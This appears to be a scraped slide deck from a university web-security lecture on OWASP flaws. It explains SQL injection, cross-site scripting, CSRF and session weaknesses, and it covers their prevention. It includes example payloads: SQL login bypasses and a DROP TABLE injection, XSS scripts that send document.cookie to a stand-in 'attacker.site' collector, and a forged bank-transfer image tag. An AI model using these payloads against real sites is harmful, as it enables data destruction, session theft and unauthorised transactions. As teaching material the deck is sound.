Upload
wilfred-holland
View
225
Download
0
Embed Size (px)
Citation preview
Topic 7: Web Security
Lecture 16
OWASP: TOP 10 attack in 2013OWASP: The Open Web Application Security Project
https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP: TOP 10 attack in 2013OWASP: The Open Web Application Security Project
https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP: TOP 10 attack in 2013OWASP: The Open Web Application Security Project
https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP: TOP 10 attack in 2013OWASP: The Open Web Application Security Project
https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP: TOP 10 attack in 2013OWASP: The Open Web Application Security Project
https://www.owasp.org/index.php/Top_10_2013-Top_10
1. Injection Flaws a) SQL Injection, XPATH Injection, etc
2. Cross-Site Scripting (XSS)3. Cross-Site Request Forgery (CSRF)4. Insecure Direct Object Reference5. Broken Authentication and Session
Management6. Failure to Restrict URL Access7. Insecure Cryptographic Storage
This presentation’s reordered list
• A class of code-injection attacks, in which data provided by the user is included in an SQL query in such a way that part of the user’s input is treated as SQL code
8
SQL Injection
• Two important characteristics:– Injection mechanism– Attack intent
9
SQL Injection
• Injection through user input• Injection through cookies• Injection through server variables• Second-order injection
10
First-order injection
Injection Mechanism
First-order injection• The application processes
the input, causing the attacker’s injected SQL query to execute.
Second-order injection• The application stores that
input for future use (usually in the database), and responds to the request.
• The attacker submits a second (different) request.
• To handle the second request, the application retrieves the stored input and processes it, causing the attacker’s injected SQL query to execute.
11
Injection Mechanism
$query = “select * from Users where user_id = ‘” . $_POST[‘user_id’] . “’ and password = ‘” . $_POST[‘password’] . “’” ;
User ID :
Password :
mshb95
mypassword
select * from Users where user_id = ‘mshb95’ and password = ‘mypassword’
User ID :
Password :
mshb95
‘ OR 1 = 1
select * from Users where user_id = ‘mshb95’ and password = ‘’ OR 1 = 1
First order SQL injection
$query = “select * from Users where user_id = ‘” . $_POST[‘user_id’] . “’ and password = ‘” . $_POST[‘password’] . “’” ;
select * from Users where user_id = ‘’ OR 1 = 1 ; /* ‘and password = ‘*/--’
First order SQL injectionNo need to know the user id
User ID :
Password :
‘ OR 1 = 1 ; /*
*/--
$query = “select * from Users where user_id = ‘” . $_POST[‘user_id’] . “’ and password = ‘” . $_POST[‘password’] . “’” ;
User ID :
Password :
‘ OR 1 = 1 ; DROP TABLE X/*
*/--
select * from Users where user_id = ‘’ OR 1 = 1 ;DROP TABLE X /* ‘and password = ‘*/--’
A more malicious example
15
• Inserting text fields that will pass initial validation, but could be used later on.– e.g. Adding a new user on a web form– Username: alice'' or username=''admin– After insert actual user name in database
• alice’ or username=‘admin– Later, the user updates her password. – The application runs:update users set password='$password' where username='$username'
– The query expands to:update users set password='newpw' where username='alice' or username='admin'
Second Order SQL Injection
• Option #1: Validate all inputs, reject evil inputs– Regexps work pretty well on numbers
• Option #2: Use mysql_real_escape_string– Prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
• Option #3: Have length limits on input– Many SQL injection attacks depend on entering long
strings
Preventing SQL injection attack
• Option #4: Scan query string for undesirable word combinations that indicate SQL statements– INSERT, DROP, etc. – If you see these, can check against SQL syntax to see if they
represent a statement or valid user input
• Option #5: Limit database permissions and segregate users
• Option #6: Use prepared or parameterized statements instead of concatenating
Preventing SQL injection attack
Codeigniter: Prepared SQL
• “Injection Flaw” is a blanket term• SQL Injection is most prevalent• Other forms:
– XPath Injection– Command Injection– LDAP (Lightweight Directory Access Protocol) Injection– DOM (Document Object Model) Injection– JSON (Javascript Object Notation) Injection– Log Spoofing– On and on and on…
Injection Impacts: More than SQL
Cross Site Scripting CSS / XSS Attack
• Cross-Site Scripting, or XSS (not to be confused with CSS or Cascading Style Sheets), allows attackers to inject client-side script in a web page.
• The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash into an application to try to get access to sensitive information
• Dynamic websites (using AJAX, Flex, for example) are vulnerable. Static websites are not at risk.
What is CSS or XSS
Fall 2011/Topic 8 22
• Web pages (HTML) can embed dynamic contents (code) that can be executed on the browser
• JavaScript– embedded in web pages and executed inside browser
• VBScript– similar to JavaScript, only for Windows
• Java applets– small pieces of Java bytecodes that execute in browsers
CS526
Client side scripting
Fall 2011/Topic 8 23
<html> … <P> <script>
var num1, num2, sumnum1 = prompt("Enter first number")num2 = prompt("Enter second number")sum = parseInt(num1) + parseInt(num2)alert("Sum = " + sum)
</script>…
</html>
Browser receives content, displays HTML and executes scripts
CS526
HTML and scripting
Fall 2011/Topic 8 24
• Client-side scripting is powerful and flexible, and can access the following resources– Local files on the client-side host• read / write local files
– Webpage resources maintained by the browser• Cookies• Domain Object Model (DOM) objects
– steal private information– control what users see– impersonate the user
– Many more
CS526
Scripts are powerful
function ajaxResponse(){ // check to see if we're done if (ajaxRequest.readyState != 4) return; else { // check to see if successful if (ajaxRequest.status == 200) { document.getElementById("showtime").innerHTML =
ajaxRequest.responseText;
} else alert("Request failed: " + ajaxRequest.statusText); } }
Manipulating DOM Object
Fall 2011/Topic 8 26
• Web users visit multiple websites simultaneously
• A browser serves web pages (which may contain programs) from different web domains– i.e., a browser runs programs provided by mutually untrusted entities– Running code one does not know/trust is dangerous– A browser also maintains resources created/updated by web domains
• Browser must confine (sandbox) these scripts so that they cannot access arbitrary local resources
• Browser must have a security policy to manage/protect browser-maintained resources and to provide separation among mutually untrusted scripts
CS526
Browser as an Operating System
Fall 2011/Topic 8 27
• The basic security model enforced in the browser• SOP isolates the scripts and resources
downloaded from different origins– E.g., evil.org scripts cannot access bank.com
resources• Use origin as the security principal• Origin = domain name + protocol + port– all three must be equal for origin to be considered
the same
CS526
Same Origin Policy (SOP)
• Same-origin policy applies to the following accesses:– manipulating browser windows – URLs requested via the XmlHttpRequest
• XmlHttpRequest is an API that can be used by web browser scripting languages to transfer XML and other text data to and from a web server using HTTP, by establishing an independent and asynchronous communication channel. – used by AJAX
– manipulating frames (including inline frames) – manipulating documents (included using the object tag) – manipulating cookies
SOP: What it controls
• Poorly enforced on some browsers– Particularly older browsers
• Limitations if site hosts unrelated pages– Example: Web server often hosts sites for unrelated parties
• http://www.example.com/account/ • http://www.example.com/otheraccount/
– Same-origin policy, allows script on one page to access properties of document from another
• Can be bypassed in Cross-Site-Scripting attacks
Problems with SOP
• Reflected XSS• Stored XSS (a.k.a. “Persistent XSS”)
Types of XSS / CSS
Reflected XSS attack
• This script is named welcome.cgi, and its parameter is “name”. It can be operated this way:
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0 Host: www.vulnerable.site ... And the response would be: <HTML> <Title>Welcome!</Title> Hi Joe Hacker <BR> Welcome to our system ... </HTML>
Site vulnerable to CSS/XSS attack
Send URL to userhttp://www.vulnerable.site/welcome.cgi?name=<script> alert(document.cookie)</script>
The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:
GET/welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0Host: www.vulnerable.site
And the vulnerable site response would be:
<HTML><Title>Welcome!</Title>Hi <script>alert(document.cookie)</script><BR>Welcome to our system</HTML>
Reflected CSS/XSS attack
• The victim client’s browser would interpret this response as an HTML page containing a piece of Javascript code.
• This code, when executed, shows a pop-up window showing all client cookies belonging to www.vulnerable.site.
• Of course, a real attack would consist of sending these cookies to the attacker. For this:– The attacker may erect a web site (www.attacker.site)– Use a script to receive the cookies. – Instead of popping up a window, send it to his/her own site (
www.attacker.site
Reflected CSS/XSS attack
• The malicious link would be:
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>
And the response page would look like: <HTML> <Title>Welcome!</Title> Hi<script>window.open(“http://www.attacker.site/collect.cgi?
cookie=”+document.cookie)</script> <BR> Welcome to our system ... </HTML>
Reflected CSS/XSS attack
Attack Server
Server Victim
User Victim
Inject malicious script
request contentreceive malicious script
1
2
3
steal valuable data
4
Store bad stuff
Download it
Stored CSS/XSS attack
• JavaScript supplied by the attacker is stored by the website (e.g. in a database)
• Doesn’t require the victim to supply the JavaScript somehow, just visit the exploited web page
• More dangerous than Reflected XSS– Has resulted in many XSS worms on high profile
sites like MySpace and Twitter
Stored CSS/XSS attack
• Everyone can post comments, which will be displayed to everyone who view the post
• Attacker posts a malicious comment that includes scripts <script>window.open(“http://www.attacker.site/collect.cgi?
cookie=”+document.cookie)</script>
• Anyone who view the post can have local authentication cookies stolen
• Web apps will check that posts do not include scripts, but the check sometimes fail.
Stored XSS attack on blog sites
• Users can post HTML on their pages– MySpace.com ensures HTML contains no
<script>, <body>, onclick, <a href=javascript://>
– However, attacker find out that a way to include Javascript within CSS tags:
<div style=“background:url(‘javascript:alert(1)’)”>
And can hide “javascript” as “java\nscript”• With careful javascript hacking:– Samy’s worm: infects anyone who visits an infected
MySpace page … and adds Samy as a friend.– Samy had millions of friends within 24 hours.
• More info: http://namb.la/popular/tech.html
Myspace.com (Samy worm)
Broken Authentication and Session management
• Results from bad implementation of authentication and session management – An attacker steals credentials or hijack a session
• Could happen – if you are not using https on authenticated pages– Because of XSS flaws we discussed earlier– if an attacker can get your password– Application session timeout is set for a very long time,
at a public terminal, user closes browser instead of logging out
How the attack happens?
• Always use https for any authenticated URLs• If storing credentials in a database, store them
encrypted or hashed• Set session timeouts to as low as possible to
reduce the risk of exposure to someone who forgets to log out at a public terminal
Prevention
1. Injection Flaws a) SQL Injection, XPATH Injection, etc
2. Cross-Site Scripting (XSS)3. Cross-Site Request Forgery (CSRF)4. Insecure Direct Object Reference5. Broken Authentication and Session
Management6. Failure to Restrict URL Access7. Insecure Cryptographic Storage
This presentation’s reordered list
CSRF Attack(Cross Site Request
Forgery)
• CSRF is a request made to the server that the server is not able to determain whether the request is coming from the user or an attacker.
What is CSRF?
Browser
Bank
Bill FavoriteForum/blog
http://mybank.com/transfer?from=bill&amount=10000&for=someguy
<img src=http://mybank.com/transfer?from=bill&amount=10000&for=someguy />
http://mybank.com/showaccount?id=bill
CSRF Example
• Re-authenticate or CAPTCHA for extra-sensitive pages
• Good frameworks save a unique ID in the session and verify each request
Prevention
??? Questions/
Confusions?